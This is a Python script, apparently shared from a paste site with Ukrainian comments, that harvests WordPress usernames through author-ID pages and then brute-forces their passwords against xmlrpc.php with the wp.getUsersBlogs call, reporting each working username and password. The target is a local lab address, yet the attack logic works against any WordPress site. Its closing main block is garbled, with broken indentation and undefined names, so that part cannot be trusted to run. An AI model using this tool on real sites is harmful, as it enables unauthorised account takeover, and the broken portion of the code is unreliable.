import itertoolsimport requestsfrom multiprocessing import Poolfrom lxml i

1. import itertools
2. import requests
3. from multiprocessing import Pool
4. from lxml import html
5. # - - - - - - - - - - - Вхідні дані - - - - - - - - - - -
6.  
7. XML = '''
8. <?xml version="1.0" encoding="UTF-8"?>
9. <methodCall>
10. <methodName>wp.getUsersBlogs</methodName>
11. <params>
12. <param>
13.  <value>
14.   <string>{username}</string>
15.  </value>
16. </param>
17. <param>
18.  <value>
19.   <string>{password}</string>
20.  </value>
21. </param>
22. </params>
23. </methodCall>
24. '''
25.  
26. TARGET_URL = 'http://192.168.1.6/xmlrpc.php'
27. AUTHOR_URL = 'http://192.168.1.6/?author={id}'
28.  
29. # - - - - - - - - - - - - - - - - - - - - - - - - - - -
30.  
31.  
32. def wrap_creds_in_xml(username="", password=""):
33.     """З XML беремо username і password"""
34.     return XML.format(username=username, password=password)
35.  
36.  
37. def is_correct(text=""):
38.     """Записуємо лише успішні моменти підбору пароля"""
39.     constant = 'Incorrect username or password'
40.     return constant not in text
41.  
42.  
43. def get_usernames():
44.     """Парсимо користувачів по /?author={id}"""
45.     start_id = 1
46.     f = open('C:\\Users\\xStevex\\Desktop\\username.txt', 'w')
47.  
48.     while True:
49.         r = requests.get(AUTHOR_URL.format(id=start_id))
50.         tree = html.fromstring(r.content)
51.         title = tree.findtext('.//title')
52.         if "Page not found – user's Blog!" in title:
53.             f.close()
54.             break
55.  
56.         f.write(title.split()[0] + '\n')
57.         start_id += 1
58.  
59.     with open('C:\\Users\\xStevex\\Desktop\\username.txt') as file:
60.         text_as_string = file.read()
61.         return text_as_string.split()
62.  
63.  
64. def get_passwords():
65.     """Підтягуємо паролі"""
66.     with open('C:\\Users\\xStevex\\Desktop\\passwords.txt') as file:
67.         text_as_string = file.read()
68.         return text_as_string.split('\n')
69.  
70.  
71. def main():
72.     """Сам процес бруртфорсу"""
73.     users = get_usernames()
74.     passwords = get_passwords()
75.     for user, password in itertools.product(users, passwords):
76.         payload = wrap_creds_in_xml(username=user, password=password)
77.         response = requests.post(TARGET_URL, payload)
78.         correct = is_correct(text=response.text)
79.         if correct:
80.             print('[+] {}/{}'. format(user, password))
81.         else:
82.             print('[-] {}/{} '.format(user, password))
83. # - - - - - - - - - - - MAIN - - - - - - - - - - -
84.  
85.  
86. if __name__ == '__main__':
87. p = multiprocessing.Process(main)
88.     processes.append(p)
89. #starting all processes
90. for i in processes:
91.     i.start()
92. #if 1 process is dead kill others
93. kill = False
94. while(True):
95.     for i in processes:
96.         if i.is_alive() == False:
97.             kill = True
98.     if kill == True:
99.         for i in processes:
100.             i.terminate()
101.         break